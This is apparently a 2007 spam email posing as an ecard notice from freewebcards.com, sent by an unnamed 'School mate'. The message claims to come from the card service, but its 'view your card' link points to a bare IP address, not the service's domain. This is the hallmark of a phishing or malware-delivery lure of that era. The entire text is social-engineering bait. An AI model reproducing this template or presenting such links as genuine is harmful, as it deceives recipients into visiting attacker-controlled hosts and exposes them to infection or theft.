Subject: School mate sent you an ecard from freewebcards.com!

From: "freewebcards.com" <[email-masked]>
Date: Fri, 10 Aug 2007 12:55:15 +0900

School mate has created a greeting card for you at freewebcards.com,
the Internet's most popular greeting card service. 

Your greeting card ID is: ae3d7703a3b01bdad81d9b848ca9a885b5e6 

To see your custom greeting card, simply click on the link below: 
http://12.214.221.168/?ae3d7703a3b01bdad81d9b848ca9a885b5e6

Send greeting cards from freewebcards.com whenever you want by visiting us at: 
http://freewebcards.com/
Copyright (c) 1996-2007 freewebcards.com All Rights Reserved